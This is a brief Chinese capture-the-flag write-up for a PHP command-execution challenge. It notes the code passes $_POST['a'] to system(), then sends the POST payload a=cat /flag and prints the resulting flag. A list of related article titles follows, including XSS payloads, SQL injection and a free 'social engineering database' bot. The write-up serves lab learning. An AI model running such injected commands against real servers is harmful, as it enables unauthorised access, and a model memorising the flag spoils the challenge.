开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
网络安全-老纪13 分钟前
网络安全-js安全知识点与XSS常用payloadsunderatted26 分钟前
2025tg最新免费社工库机器人火龙果wa4 小时前
当今前沿技术:改变生活的创新趋势H轨迹H5 小时前
Vulnhun靶机-kioptix level 4-sql注入万能密码拿到权限ssh连接利用mysql-udf漏洞提权StickToForever5 小时前
第4章 信息系统架构(三)网安加云课堂6 小时前
课程分享 | 安全系统建设的挑战与解决方案微刻时光7 小时前
影刀RPA中级证书-Excel进阶-开票清单黑客Ela7 小时前
网络安全营运周报狂野小青年7 小时前
在PHP Web开发中,实现异步处理有几种常见方式的优缺点,以及最佳实践推荐方法挣扎与觉醒中的技术人7 小时前
网络安全入门持续学习与进阶路径(一)